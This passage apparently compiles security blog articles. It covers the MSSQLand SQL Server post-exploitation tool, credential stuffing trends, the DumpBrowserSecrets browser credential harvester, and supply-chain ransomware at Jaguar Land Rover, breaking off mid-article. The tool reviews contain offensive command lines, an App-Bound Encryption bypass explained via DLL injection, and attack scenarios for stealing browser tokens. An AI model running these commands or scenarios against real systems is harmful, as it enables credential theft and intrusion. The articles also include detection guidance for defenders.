MSSQLand.exe localhost:1434@db03 -c token info

# Linked server chain traversal
# Format: server:port/user@database or any combination
# Semicolon (;) separates servers, forward slash (/) specifies impersonation
MSSQLand.exe localhost -c token -l SQL01;SQL02/admin;SQL03@clients info

# Configuration Manager actions (cm- prefix)
MSSQLand.exe sccm-db.corp -c token cm-devices
MSSQLand.exe sccm-db.corp -c token cm-scripts

# CSV output for automation
MSSQLand.exe localhost -c token --format csv --silent procedures > procedures.csv

The tool supports flexible host specification, including optional port numbers (default 1433), user impersonation contexts, and database contexts. Linked server chains use semicolon separators and support bracket notation for server names containing delimiter characters. Port specification only applies to the initial host connection; linked servers use configured names from sys.servers.

For detailed action-specific help, use the -h flag with a search term or append -h to an action name. For example, MSSQLand.exe -h adsi shows all Active Directory Services Interface-related actions, while MSSQLand.exe localhost -c token createuser -h displays detailed help for the createuser action.

Attack Scenario

A red team operator gains access to a Windows system during an assumed-breach engagement. The operator discovers that the compromised user account has SQL Server authentication credentials stored in a configuration file. The target environment uses linked SQL Server instances across multiple tiers (web database server, application database server, reporting database server) with trust relationships configured between them. Traditional lateral movement paths via SMB or WinRM are heavily monitored, but database connections are considered normal administrative activity and generate minimal alerts.

The operator loads MSSQLand via Cobalt Strike beacon assembly execution and performs a connection test to validate credentials without triggering database audit logs. The test confirms access to the web tier database server. Using the info action, the operator enumerates linked servers and discovers that the web tier server has an RPC Out trust configured to the application tier server, which in turn links to a reporting server with elevated privileges. The operator constructs a linked server chain using the -l flag, specifying SQL01;SQL02;SQL03, and executes commands through the chain without needing to manually craft nested OPENQUERY statements.

From the reporting server context, the operator discovers a Configuration Manager database. Using MSSQLand’s cm- prefixed actions, the operator enumerates managed devices, scripts, and deployment packages. The cm-devices action reveals high-value targets, including domain controllers and executive workstations. The operator extracts device records, identifies targets with recent check-in timestamps, and uses the information to prioritize next-stage objectives. The entire reconnaissance and lateral movement phase completes without generating suspicious PowerShell or WMI events, as all activity flows through legitimate SQL Server protocols.

Red Team Relevance

SQL Server lateral movement remains underexploited in many red team engagements despite its prevalence in enterprise environments. Linked server trust relationships frequently span security boundaries, allowing operators to pivot from low-privilege web application databases to highly privileged reporting or Configuration Manager instances. MSSQLand removes the primary friction point in SQL Server post-exploitation: the need to manually construct and debug nested T-SQL queries while operating through a beacon or constrained shell.

The tool’s assembly execution design makes it particularly valuable for C2 frameworks where interactive console sessions are limited or monitored. Operators can execute complex multi-hop database traversals with a single-line command, reducing engagement time and minimizing the detection surface. The Configuration Manager support is especially relevant given that SCCM/MECM databases are high-value targets for privilege escalation and infrastructure mapping, yet often lack the hardening applied to Active Directory or endpoint management systems.

MSSQLand also addresses OPSEC considerations that plague traditional database tools. Connection testing without query execution allows credential validation without touching audit-logged tables. The clean output format integrates directly into reporting workflows, reducing the post-engagement effort required to document database access paths. For operators who regularly encounter SQL Server instances during engagements, MSSQLand provides capabilities similar to what BlockEDRTraffic offers for EDR evasion, what SmbCrawler provides for SMB share enumeration, or what CredNinja delivers for credential validation: a focused, practical tool that solves a specific operational problem without requiring extensive T-SQL knowledge.

Detection and Mitigation

SQL Server audit logging should be configured to capture connection attempts, privilege changes via EXECUTE AS USER, and cross-server queries using linked servers. Organizations should monitor for unusual linked server traversal patterns, especially chains that originate from web-facing database servers and terminate at privileged infrastructure databases. Access to the Configuration Manager database by non-administrative accounts warrants immediate investigation, as these databases contain sensitive device inventory and deployment information.

Network segmentation should restrict database server communication to legitimate application tiers. Web tier databases should not have direct RPC Out trust relationships to reporting or management databases. Where linked servers are required for business functionality, implement the principle of least privilege by restricting linked server login mappings to specific service accounts with minimal permissions. Disable xp_cmdshell and other extended stored procedures unless explicitly required and audited.

Blue teams should deploy database activity monitoring solutions that detect OPENQUERY and EXECUTE AT usage patterns inconsistent with normal application behavior. Anomalous login times, source IP addresses outside expected ranges, and rapid sequential queries across linked instances are reliable indicators of post-exploitation activity. For Configuration Manager environments, restrict database access to designated SCCM infrastructure servers and alert on any connections from workstations or non-administrative hosts.

Frequently Asked Questions

What is MSSQLand and how is it different from SQLRecon?

MSSQLand is a .NET Framework 4.8 tool for interacting with Microsoft SQL Server instances during red team operations. Unlike SQLRecon, MSSQLand was built from the ground up with object-oriented programming principles for easier extensibility and modular action development. It simplifies traversal of linked server chains and user impersonation without requiring operators to manually craft complex T-SQL queries.

Does MSSQLand work with Cobalt Strike and other C2 frameworks?

Yes. MSSQLand is designed specifically for assembly execution from C2 frameworks, including Cobalt Strike, Havoc, Sliver, and similar platforms. The tool requires no installation or registration on the target system, making it ideal for operations in constrained or monitored environments where traditional database tools are unavailable.

Can MSSQLand traverse multiple linked SQL Server instances?

Yes. MSSQLand automates linked server chain traversal using the -l flag with semicolon-separated server names. The tool automatically generates the necessary OPENQUERY and RPC Out statements, allowing operators to pivot through multiple SQL Server instances without manually crafting nested T-SQL queries. For example, MSSQLand.exe localhost -c token -l SQL01;SQL02;SQL03 info chains through three servers in a single command.

What authentication methods does MSSQLand support?

MSSQLand supports Windows authentication and SQL Server authentication, and can work with Kerberos tickets when used with external ticket injection tools. The tool also supports user impersonation via EXECUTE AS USER to escalate privileges within database contexts without requiring system-level permissions on the target server.

Does MSSQLand support Microsoft Configuration Manager (SCCM) exploitation?

Yes. MSSQLand includes comprehensive Configuration Manager support with cm- prefixed actions that align with Microsoft’s official PowerShell cmdlet naming convention. Operators can enumerate managed devices (cm-devices), scripts (cm-scripts), packages, and other ConfigMgr infrastructure to identify high-value targets and prioritize next-stage objectives during engagements.

How does MSSQLand maintain OPSEC during database reconnaissance?

MSSQLand includes a connection testing mode that validates credentials without executing queries, allowing operators to verify access without touching audit-logged tables. The tool also provides CSV export options for automated processing, reducing the need for interactive console sessions that might generate suspicious activity logs. All operations flow through legitimate SQL Server protocols rather than PowerShell or WMI, minimizing detection surface in monitored environments.

Conclusion

MSSQLand addresses a practical gap in red team tooling for SQL Server post-exploitation. Its focus on linked server traversal, user impersonation, and Configuration Manager enumeration makes it directly applicable to real-world engagements where database access exists, but traditional lateral movement paths are blocked or monitored. The tool’s design for assembly execution and its minimal OPSEC footprint align with modern C2 workflows, and its clean output format reduces friction in both the operational and reporting phases of engagements. For red teams operating in Windows enterprise environments, MSSQLand is a focused addition to the lateral movement toolkit that complements broader frameworks without requiring extensive database expertise.

You can read more or download MSSQLand here: https://github.com/n3rada/MSSQLand

Credential Stuffing in 2025 – How Combolists, Infostealers and Account Takeover Became an Industry

Stolen credentials are now the single most reliable entry point into enterprise networks. Compromised credentials accounted for 22% of all confirmed data breaches in the period covered by Verizon’s extended credential stuffing analysis accompanying the 2025 DBIR, making it the most common initial access vector for the third consecutive year. Credential stuffing, the automated replay of stolen username-password pairs at scale, requires minimal skill, costs almost nothing to run, and succeeds at rates that make it economically rational to run campaigns against thousands of targets simultaneously. Multi-factor authentication (MFA) remains the single most effective control against it, yet deployment gaps persist across sectors that should know better.

The Credential Supply Chain

Credential stuffing depends on a supply chain that runs from infostealer malware through dark web markets to attack tooling. Malware families, including Lumma, RedLine, StealC, and Acreed, scrape browser password vaults, saved cookies, and autofill data from compromised machines. The harvested data is identical to what tools like DumpBrowserSecrets extract during post-exploitation: saved passwords, session cookies, OAuth refresh tokens, and autofill entries pulled directly from Chrome, Edge, Firefox, and every other major browser. Attackers package that raw material into structured files known as combolists, formatted as email: password pairs, cleaned of duplicates, and categorised by service type or geography before selling them on.

Combolists trade freely across dark web forums, Telegram channels, and dedicated cracking communities. The initial access broker ecosystem documented throughout 2025 has normalised validated credentials as a commodity. Fresh lists built from recent infostealer logs command significantly higher prices than aged database dumps because they have higher validity rates. The Verizon analysis found that only 49% of a user’s passwords across different services are distinct. That figure is what makes credential stuffing economically viable: breach one service, and there is roughly a 50% chance the same password works elsewhere. Across millions of accounts, that probability becomes near-certainty.

The tooling that drives attacks is openly available. OpenBullet and its successor, SilverBullet, are credential-stuffing frameworks originally released as penetration testing utilities, now standard tools in account-takeover (ATO) operations. They automate the full attack loop: loading combolists, rotating through residential proxies to dodge rate limiting and IP blocks, sending login requests that mimic legitimate browser behaviour, and logging successful hits. Attackers also buy and sell custom configuration files, known as configs, that define the authentication flow for specific target services. Unofficial marketplaces offer configs for specific banking portals, SaaS platforms, and enterprise single sign-on (SSO) providers alongside combolists and proxy subscriptions.

Three Case Studies from 2025

In late March 2025, coordinated credential stuffing attacks hit five major Australian superannuation funds simultaneously: AustralianSuper, Rest Super, Hostplus, Australian Retirement Trust, and Insignia Financial. As BleepingComputer reported on the coordinated attacks, attackers compromised over 20,000 accounts across the five funds, with four AustralianSuper members losing a combined AUD 500,000. The attackers used combolists from prior unrelated breaches. AustralianSuper offered MFA but did not enforce it at login, a gap that regulators identified as the primary enabling factor. Retirement funds make attractive targets because account balances are high, withdrawals are slow to reverse, and many members check their accounts infrequently.

In April 2025, VF Corporation notified customers of a credential-stuffing attack against the North Face online store. BleepingComputer’s coverage of the April incident confirmed that attackers used credentials from earlier unrelated breaches to access accounts and exfiltrate names, email addresses, shipping addresses, phone numbers, purchase history, and dates of birth. Payment card data was not exposed, as a third-party provider handles payment processing. The April attack followed a March incident that exposed 15,700 accounts across The North Face and Timberland. It was the fourth credential stuffing incident against VF Corporation brands since 2020. The pattern reflects a structural problem: tens of millions of customer accounts, high password reuse rates, and authentication systems not designed to detect low-and-slow validation campaigns.

The Change Healthcare breach in February 2024 remains the most consequential recent example of credential-based initial access. The ALPHV/BlackCat ransomware group entered UnitedHealth’s Change Healthcare subsidiary through compromised Citrix credentials on a remote-access portal without MFA, as confirmed in Congressional testimony from UnitedHealth’s CEO. The attackers moved laterally through the billing network and deployed ransomware that shut down payment processing for healthcare providers across the United States for weeks. The incident produced a $22 million ransom payment and an estimated $872 million in reported disruption costs in the first quarter alone. One set of valid credentials on one unprotected endpoint caused one of the largest healthcare-sector disruptions in US history.

Detection and Evasion Techniques

Modern credential stuffing campaigns specifically target the detection mechanisms most organisations have deployed. Attackers bypass velocity-based controls that flag high volumes of failed login attempts from a single IP by rotating through residential proxies. They distribute attempts across thousands of IP addresses so each one generates only a handful of requests, staying below alert thresholds. Third-party CAPTCHA-solving services handle challenge pages, some of which are automated via machine learning and others through human labour farms. Tools that emulate legitimate browser environments, including correct JavaScript execution, realistic mouse movement patterns, and authentic request timing, defeat browser fingerprinting.

The MITRE ATT&CK framework categorises credential stuffing under T1110.004 (Brute Force: Credential Stuffing). Defenders should monitor for several specific signals: unusual geographic distributions of authentication requests, spikes in failed logins spread across a wide IP range rather than concentrated at a single source, and successful logins from IP addresses tied to residential proxy services. Account logins from devices or browsers with no prior history on the account also warrant investigation. The Verizon analysis found that credential stuffing accounted for a median of 19% of all authentication attempts across SSO providers, meaning roughly one in five login attempts was not legitimate.

One underappreciated detection gap is the window between credential exposure and organisational awareness. Dark web monitoring tools available to enterprise teams in 2025 make it operationally achievable to track stealer log markets and paste sites for corporate email domains. Many organisations still treat that monitoring as optional rather than a core detection layer. Credentials circulate in combolists for months before the affected organisation becomes aware, and attackers exploit that window systematically.

Regulatory Response

The 23andMe case produced the most visible regulatory outcome tied directly to credential stuffing. A 2023 attack using combolists accessed approximately 6.9 million customer records. The UK Information Commissioner’s Office fined the company £2.31 million for failing to implement adequate security, specifically the absence of mandatory MFA for accounts holding sensitive genetic data. In March 2025, as Wired reported in its coverage of the 23andMe bankruptcy, the company filed for Chapter 11, with the credential stuffing incident and its downstream legal consequences cited as contributing factors. Regulators in the UK and EU now reference the case as evidence that weak authentication controls constitute a material governance failure, not a technical oversight.

CISA’s 2024 guidance on phishing-resistant MFA explicitly identifies credential stuffing as a primary threat driver. It recommends hardware security keys and passkeys using the WebAuthn standard as the only controls that fully eliminate the credential reuse vector. SMS one-time passwords and Time-based One-Time Password (TOTP) codes provide partial protection but remain vulnerable to adversary-in-the-middle (AiTM) interception, a technique increasingly applied against accounts whose value justifies the extra effort.

CISO Playbook

Phishing-resistant MFA enforced across all externally facing authentication endpoints, including VPN portals, SSO providers, and remote desktop services, eliminates the primary path for exploitation. Password screening against known-breach corpora at login and account creation, using services such as the Have I Been Pwned API, removes credentials already circulating in combolists before attackers can validate them. Rate limiting and progressive account lockout on all authentication endpoints, including API login flows that teams frequently overlook, cuts the volume of attempts that reach the validation stage.

Bot detection that analyses behavioural signals, including request timing, device fingerprint consistency, and session cookie behaviour, provides a second line of defence against campaigns that have already bypassed IP-based controls. For organisations on legacy identity infrastructure, a full platform replacement is not the immediate priority. Enforcing MFA on the externally facing authentication layer, regardless of what sits behind it, addresses the highest-risk exposure first. The Change Healthcare incident is the clearest available proof of what one unprotected endpoint costs at scale.

There is no technical solution that eliminates credential stuffing entirely. Password reuse persists, infostealers continue operating at scale, and combolists will keep growing. The practical objective for defenders is to raise the cost of a successful attack on their specific environment above what attackers can profitably tolerate, and to detect the attempts that do succeed before they compound into something worse. Given that 22% of breaches in 2025 started with a valid credential, organisations that treat authentication hygiene as routine maintenance rather than a strategic priority are already in the breach statistics.

Frequently Asked Questions

What is credential stuffing, and how does it differ from brute force?

Credential stuffing uses real username-password pairs stolen from previous breaches and automatically replays them against other services. Brute force generates password guesses from scratch. Stuffing is faster, quieter, and far more effective because it exploits password reuse rather than attempting to crack unknown passwords. A combolist of 10 million verified credentials will outperform any brute-force dictionary attack against the same target.

What is a combolist, and where do attackers get them?

A combolist is a structured file of email-and-password pairs compiled from data breaches, infostealer malware logs, and dark web markets. Attackers source them from initial access broker forums, Telegram channels, and dedicated credential marketplaces. Fresh lists derived from recent infostealer campaigns are the most valuable because their owners have not yet rotated the credentials.

How do attackers bypass rate limiting and CAPTCHA during credential stuffing?

Attackers use residential proxy networks to distribute login attempts across thousands of IP addresses, keeping per-IP request volumes below detection thresholds. CAPTCHA challenges are handled by third-party solving services, either via automated machine-learning methods or by human labour farms. Tools such as OpenBullet and SilverBullet emulate realistic browser behaviour, including JavaScript execution and mouse-movement patterns, to evade browser fingerprinting controls.

Does multi-factor authentication stop credential stuffing?

Phishing-resistant MFA using hardware security keys or passkeys under the WebAuthn standard fully eliminates the credential reuse vector. SMS one-time passwords and TOTP codes reduce exposure but remain vulnerable to adversary-in-the-middle interception. The Change Healthcare breach, which resulted in $872 million in disruption costs, occurred on a Citrix portal with no MFA. Enforcing MFA on every externally facing authentication endpoint is the single highest-impact control available.

What are the most common targets for credential stuffing attacks?

Enterprise SSO portals, VPN gateways, e-commerce account login pages, financial services platforms, and healthcare provider systems are the most frequently targeted. Retirement and superannuation funds have emerged as high-value targets in 2025 because account balances are large, members check accounts infrequently, and MFA enforcement has historically been optional rather than mandatory.

How can organisations detect credential stuffing attacks in progress?

Key signals include spikes in authentication requests distributed across a wide IP range rather than concentrated at a single source, successful logins from residential proxy IP addresses, account access from devices or browsers with no prior history, and unusual geographic distributions in login activity. Continuous monitoring of dark web stealer log markets for corporate email domains provides early warning before credentials are actively exploited. The Verizon 2025 DBIR found that credential stuffing accounts for a median of 19% of all SSO authentication attempts, so baseline volume analysis is also a viable detection layer.

This article covers techniques used by both attackers and defenders for educational and research purposes. The tools and marketplaces described are documented by security researchers and law enforcement agencies.

DumpBrowserSecrets – Browser Credential Harvesting with App-Bound Encryption Bypass

DumpBrowserSecrets is a post-exploitation credential-harvesting tool from Maldev Academy that extracts secrets across all major browsers from a single Windows executable. It is the successor to their earlier DumpChromeSecrets project, which is now deprecated, and extends coverage from Chrome alone to the full range of Chromium-based and Gecko-based browsers in common enterprise use.

Modern browsers are credential vaults. Chrome, Microsoft Edge, Firefox, Opera, Opera GX, and Vivaldi all store saved passwords, session cookies, OAuth refresh tokens, credit card numbers, autofill data, and full browsing history in local SQLite databases and JSON files on disk. On a compromised Windows host, that data is frequently the fastest path to lateral movement, cloud account takeover, or persistent access to enterprise SaaS platforms without ever touching LSASS.

Where tools like Mimikatz target Windows credential stores such as LSASS and the Security Account Manager (SAM), DumpBrowserSecrets focuses entirely on the browser layer, where credentials are increasingly stored as enterprises adopt SSO, OAuth, and browser-based SaaS workflows. The threat model has shifted: a developer’s browser session today may hold active tokens for GitHub, AWS consoles, Okta, Slack, and internal tooling simultaneously.

How It Works

DumpBrowserSecrets consists of two components that work together: a compiled executable (DumpBrowserSecrets.exe) and a DLL (DllExtractChromiumSecrets.dll).

For Chromium-based browsers using App-Bound Encryption (Chrome, Brave, and Microsoft Edge), the challenge is that Google introduced App-Bound Encryption in Chrome 127, tying cookie and credential encryption keys to the Chrome application identity. The encryption key, stored as app_bound_encrypted_key in the browser’s Local State file, can only be decrypted via Chrome’s elevation service through the IElevator COM (Component Object Model) interface.

DumpBrowserSecrets handles this by spawning a headless Chromium process, then injecting the DLL into it via Early Bird APC (Asynchronous Procedure Call) injection, a technique that queues shellcode execution before the target process’s main thread begins. The DLL runs inside the Chromium process context, uses the IElevator COM interface to decrypt the App-Bound Encryption key, and returns the decrypted key to the executable via a named pipe. The executable then parses the browser’s on-disk SQLite databases and decrypts stored data locally.

For Opera, Opera GX, and Vivaldi, which use DPAPI (Data Protection API) keys rather than App-Bound Encryption, the same injection approach retrieves DPAPI keys instead.

For Firefox, which uses Mozilla’s NSS (Network Security Services) library with AES-256-CBC or 3DES-CBC encryption for logins, the executable handles all extraction and decryption directly with no DLL injection required.

The tool includes several evasion features relevant to operational use: compile-time string obfuscation, API hashing to defeat static analysis, PPID (Parent Process ID), and argument spoofing via NtCreateUserProcess with manual CSRSS registration, handle duplication to bypass file locks held by running browsers, and a custom SQLite3 file format parser (SQLoot, introduced in v1.1.1) that replaces the sqlite-amalgamation dependency to reduce the static footprint.

Extracted Data

The following data types are extracted per browser. Encryption models vary: Chrome, Brave, and Edge use App-Bound Encryption (V20); Opera, Opera GX, and Vivaldi use DPAPI (V10); Firefox uses NSS-based encryption for logins and stores other data types unencrypted.

Chrome, Brave, Microsoft Edge (App-Bound / V20): cookies, saved logins, credit cards, OAuth tokens, autofill entries, browsing history, bookmarks.
Opera, Opera GX, Vivaldi (DPAPI / V10): cookies, saved logins, credit cards, OAuth tokens (V10 + Base64 for Opera/Opera GX), autofill entries, browsing history, bookmarks.
Firefox (NSS): cookies, saved logins (AES-256-CBC or 3DES-CBC encrypted), OAuth tokens from signedInUser.json, autofill form history, browsing history, bookmarks.

Output is written as JSON to a file named <browser>Data.json by default, or to a path specified with the /o flag.

Installation

DumpBrowserSecrets is distributed as a pre-compiled Windows executable. No installation is required. Download the compiled binaries from the GitHub Releases page, copy DumpBrowserSecrets.exe and DllExtractChromiumSecrets.dll to the target host, and execute.

For operators who need to compile from source, the repository provides a Visual Studio solution file (DumpBrowserSecrets.sln) with three projects: Common, DllExtractChromiumSecrets, and DumpBrowserSecrets. Build in Visual Studio targeting x64 Release.

Usage

This repository does not provide a global --help flag in the traditional sense. The following usage block is reproduced verbatim from the README:

Usage: DumpBrowserSecrets.exe [options]

Options:
  /b:<browser> Target Browser: chrome, edge, brave, opera, operagx, vivaldi, firefox, all
               (default: system default browser)
  /o <file>    Output JSON File (default: <browser>Data.json)
  /all         Export All Entries (default: max 16 per category)
  /?           Show This Help Message

Examples:
  DumpBrowserSecrets.exe                            Extract 16 Entries From The Default Browser
  DumpBrowserSecrets.exe /b:chrome                  Extract 16 Entries From Chrome
  DumpBrowserSecrets.exe /b:firefox /all            Export All Entries From Firefox
  DumpBrowserSecrets.exe /b:brave /o Output.json    Extract 16 Entries From Brave To Output.json
  DumpBrowserSecrets.exe /b:all /all                Extract All From All Installed Browsers

By default, the tool extracts up to 16 entries per data category. The /all flag removes this cap. The /b:all flag targets every installed browser in a single run.

Attack Scenario

An operator lands on a developer workstation during a Windows assumed-breach engagement. The user is authenticated in Chrome to GitHub, an AWS console, Okta, and the company’s internal GitLab instance. LSASS is protected by Credential Guard and yields no useful information. The operator drops DumpBrowserSecrets.exe and its accompanying DLL to a writable directory and executes the following:

DumpBrowserSecrets.exe /b:all /all /o C:\Users\Public\out.json

The tool spawns a headless Chrome process, injects the DLL via Early Bird APC injection, and retrieves the App-Bound Encryption key via the IElevator COM interface, and decrypts the Login Data, Cookies, and Web Data SQLite databases. The resulting JSON contains active session cookies for all authenticated SaaS services, OAuth refresh tokens that survive password resets, saved plaintext credentials, and autofill data, including internal hostnames and usernames.

The operator then pipes the OAuth tokens to evilreplay for session replay against the target’s cloud services, and uses CredNinja to validate any recovered plaintext credentials against the domain before they are rotated. The entire credential extraction phase completes in under 30 seconds on a live endpoint.

Red Team Relevance

Browser credential theft is one of the most consistent post-exploitation steps in real-world intrusions. The infostealer market, including Redline, Raccoon, Vidar, and Lumma Stealer, is built almost entirely on the same primitives DumpBrowserSecrets implements. The distinction is that DumpBrowserSecrets is built for red team engagements rather than commodity malware deployment: it outputs structured JSON rather than exfiltrating to a C2 panel, and its evasion features are designed to survive EDR (Endpoint Detection and Response) scrutiny on hardened enterprise endpoints, not targeting unmonitored consumer machines.

App-Bound Encryption was Google’s deliberate attempt to raise the cost of this technique when it shipped in Chrome 127. It largely succeeded against older tools that relied solely on DPAPI decryption. DumpBrowserSecrets is one of the more complete public implementations of the IElevator COM bypass, making it directly relevant for testing whether an organisation’s endpoint controls detect or prevent this class of attack.

The tool is also useful for testing the realistic blast radius of a compromised developer endpoint, a scenario that is systematically underweighted in many assumed-breach exercises that focus on Active Directory paths while ignoring the SaaS credential surface.

Detection and Mitigation

Key detection opportunities are: process injection into a Chromium browser process from an unexpected parent, headless browser instantiation outside of CI/CD or automation contexts, reads against browser SQLite databases (Login Data, Cookies, Web Data) by processes other than the browser executable itself, and calls to the IElevator COM interface from non-browser processes.

The PPID and argument spoofing in DumpBrowserSecrets are specifically designed to defeat process lineage-based detection. EDR products that monitor IElevator COM interface calls directly, or that flag headless browser instantiation by process behaviour rather than ancestry alone, will be more effective against this technique.

At the policy level, credential managers that store secrets outside the browser (native desktop clients for Bitwarden, 1Password, or similar) avoid this attack surface entirely. Browser-stored passwords remain the weakest link in credential hygiene in most enterprise environments.

Frequently Asked Questions

Does DumpBrowserSecrets work on Chrome 127 and later with App-Bound Encryption enabled?

Yes. DumpBrowserSecrets is specifically designed to bypass App-Bound Encryption as implemented in Chrome 127 and later. It spawns a headless Chromium process, injects its DLL via Early Bird APC injection, and uses the IElevator COM interface from within the browser process context to decrypt the app_bound_encrypted_key. This makes it effective against current Chrome, Brave, and Microsoft Edge builds.

What browsers does DumpBrowserSecrets support?

DumpBrowserSecrets supports Chrome, Microsoft Edge, Brave, Opera, Opera GX, Vivaldi, and Firefox. Chrome, Brave, and Edge are handled via App-Bound Encryption bypass. Opera, Opera GX, and Vivaldi use DPAPI decryption. Firefox uses NSS-based decryption with no DLL injection required.

What data does DumpBrowserSecrets extract?

The tool extracts saved passwords, session cookies, OAuth refresh tokens, credit card numbers, autofill entries, browsing history, and bookmarks. Output is written as JSON to a file named after the target browser by default.

Does DumpBrowserSecrets require the target browser to be running?

For Chromium-based browsers using App-Bound Encryption, the tool spawns its own headless process to access the IElevator COM interface, so the browser does not need to be open. Handle duplication is used to bypass file locks on SQLite databases that may be held by a running browser instance.

Is DumpBrowserSecrets detected by antivirus or EDR?

The tool includes compile-time string obfuscation, API hashing, PPID spoofing via NtCreateUserProcess, and argument spoofing to reduce its static and behavioural detection footprint. Detection rates vary by product. EDR solutions that monitor IElevator COM interface calls by non-browser processes, or flag headless browser instantiation by process behaviour rather than parent lineage, are more likely to detect it.

What is the difference between DumpBrowserSecrets and Mimikatz for credential harvesting?

Mimikatz targets Windows credential stores including LSASS memory and the Security Account Manager (SAM). DumpBrowserSecrets focuses exclusively on browser-stored credentials, which exist in a separate layer that Mimikatz does not address. In environments where Credential Guard protects LSASS, browser credential harvesting is often the more reliable post-exploitation path.

Conclusion

DumpBrowserSecrets is a technically well-constructed post-exploitation tool that addresses a credential surface that most endpoint hardening programmes treat as an afterthought. Its coverage of the full range of major browsers, correct handling of both App-Bound Encryption and DPAPI models, and inclusion of operational evasion features make it a credible addition to a red team toolkit for assumed-breach engagements where the goal is to demonstrate realistic credential exposure beyond the traditional LSASS path.

You can read more or download DumpBrowserSecrets here: https://github.com/Maldev-Academy/DumpBrowserSecrets

Systemic Ransomware Events in 2025 – How Jaguar Land Rover Showed What a Category 3 Supply Chain Breach Looks Like

Jaguar Land Rover’s prolonged cyber outage in 2025 turned what would once have been a “single victim” ransomware story into a macroeconomic event, with factory shutdowns, government intervention, and thousands of suppliers left exposed. Reporting on the incident described a multi-week production halt, an estimated loss of tens of millions of pounds per week, and visible strain across the wider UK manufacturing ecosystem as summarised by Reuters’ coverage of the shutdown. For CISOs and security leaders, JLR is no longer just a case study, it is the reference example of what a “category-3” supply chain ransomware event looks like.

Trend Overview: From Single Victims to Systemic Events

Across 2024 and 2025, the centre of gravity for ransomware shifted from isolated IT incidents to systemic events that ripple through entire sectors. IBM’s latest threat intelligence index highlights manufacturing as the most attacked industry for the fourth year in a row, accounting for more than a quarter of observed incidents, with many of those attacks involving extortion, data theft, or operational disruption according to IBM’s 2025 Threat Intelligence Index. In other words, the JLR story is not an outlier, it sits on top of a trend where physical production and upstream suppliers are now directly in scope.

At the same time, attackers are professionalising their routes to impact. Valid accounts, access brokered on darknet markets, and exploitation of public-facing applications are now more common than noisy phishing waves as the first step in a compromise. Kaspersky’s incident response data for 2024 shows public-facing applications as the top initial vector, with valid accounts representing more than 30 percent of investigated intrusions, and specifically notes the enabling role of Initial Access Brokers selling credentials to Ransomware-as-a-Service crews in its 2024 incident response report. Those figures match what you already see in dark web listings for VPN credentials, Citrix gateways, and OT remote access portals.

On the defender side, many organisations still treat “ransomware” as a local IT disaster scenario instead of a systemic category of risk. The JLR incident, and earlier automotive hits, illustrate a different reality: a single compromise in a critical supplier or shared platform can interrupt thousands of vehicles per day, disrupt national GDP figures, and drag small suppliers to the edge of insolvency. For readers who follow the economics of exploitation, this pattern connects directly to how access and tooling are traded in underground markets, something we explored in more depth in Inside Dark Web Exploit Markets in 2025.

Campaign Analysis / Case Studies

Case Study 1: Jaguar Land Rover – When Ransomware Becomes a Macro Event

Jaguar Land Rover’s cyber incident did not just stop production for a few days; it flipped the company from profit into a quarterly loss and generated measurable drag on the wider UK economy. Public reporting indicates JLR suffered pre-tax losses of roughly £485 million in the quarter covering the attack, with almost £200 million recorded as direct exceptional costs tied to incident response and system recovery as detailed in The Guardian’s coverage of the company’s results. UK government figures later estimated the wider impact of the outage and supply chain slowdown at up to £1.9 billion in lost economic output.

The cyberattack forced JLR to close factories for much of September, with a phased restart only beginning in October. Supplier liquidity became a policy concern, prompting a government-backed loan guarantee facility worth up to £1.5 billion to stabilise the ecosystem. For CISOs, this is a clean example of a category-3 event: the incident affected enterprise IT, OT, dealer systems, and critical suppliers, and required direct government support to keep the chain intact. It also exposed gaps in cyber insurance coverage and raised uncomfortable questions about how boards evaluate “tail risk” on OT, ERP, and dealer platforms.

Case Study 2: Toyota and Kojima Industries – Historical Template for Supply Chain Shutdown

While JLR is the freshest example, the industry has already seen what happens when a single supplier becomes a single point of failure. In 2022, Toyota halted operations across 28 production lines in 14 plants after a reported cyberattack at plastic parts supplier Kojima Industries, which caused a system failure and forced a full-day shutdown of domestic manufacturing. Public estimates at the time suggested a production impact of around 13,000 vehicles, roughly five percent of Toyota’s monthly domestic output as reported by BleepingComputer’s coverage of the incident. Although operations resumed relatively quickly, the event highlighted the fragility of just-in-time manufacturing when upstream IT systems are compromised.

Toyota’s case serves as historical context for 2025. It showed that even a one-day outage at a critical supplier can have measurable production consequences. JLR’s multi-week shutdown, by contrast, demonstrates how much worse the systemic impact becomes when the victim is the OEM itself, and when the attack lands in a supply chain that spans tens of thousands of jobs and hundreds of small manufacturers with far less resilience than the flagship brand.

Case Study 3: Ferrari – Data Extortion Without OT Downtime

Not every systemic event involves factory shutdowns. In 2023, Ferrari reported a cyber incident in which attackers demanded a ransom related to customer contact details, but production and core operations continued. The company notified affected clients and brought in external investigators, but made clear it would not pay the ransom as described in Reuters’ report on the incident. For many luxury brands, that “no downtime, but sensitive data exposed” outcome is a more realistic scenario than a total OT outage.

Even without visible production impact, high-profile data extortion against brands like Ferrari carries systemic risk. Leaked customer and supplier data has value to criminal groups beyond the initial ransom demand, from bespoke phishing to social engineering against dealers and partners. For automotive CISOs, the lesson is that ransomware and data theft campaigns can create systemic exposure even when the plant keeps running and the only visible symptom is a regulatory notification and some bruised PR.

Detection Vectors and Tactics, Techniques and Procedures (TTPs)

The common thread across these incidents is not a single “zero day,” but a mix of valid accounts, exposed services, and weaknesses in partner ecosystems. Kaspersky’s recent incident response analysis notes that public-facing applications were the primary initial vector in 39.2 percent of investigated cases, while valid accounts represented 31.4 percent, with many of those linked to credentials traded by Initial Access Brokers on the darknet in its 2024 data. That mix maps cleanly to well-known MITRE ATT&CK techniques, including Exploit Public-Facing Application (T1190), Valid Accounts (T1078), and External Remote Services (T1133).

Once inside, modern ransomware crews behave more like patient intruders than smash-and-grab criminals. Coverage of the Akira ransomware group’s exploitation of a long-patched SonicWall SSLVPN flaw illustrates the pattern: chaining an access control vulnerability, weak default LDAP group settings, and misconfigured Multi-Factor Authentication (MFA) to obtain persistent access to edge devices, then pivoting to internal systems for encryption and exfiltration as documented in TechRadar’s summary of Rapid7’s advisory. Defenders who still anchor detection on “ransom note appears” or “mass encryption starts” are already too late for systemic events that unfold over weeks of silent lateral movement.

Industry Response and Law Enforcement

Industry guidance has slowly caught up with the reality that ransomware is now a supply chain and systemic risk problem, not just a local IT issue. The UK’s National Cyber Security Centre (NCSC) recommends treating supply chain security as a board-level topic, with a structured approach to understanding key suppliers, mapping dependencies, and embedding security requirements into contracts and onboarding in its supply chain security collection. For automotive and manufacturing sectors, that means extending visibility and monitoring beyond the plant to logistics providers, Tier-1 and Tier-2 suppliers, dealer networks, and even outsourced IT and finance functions.

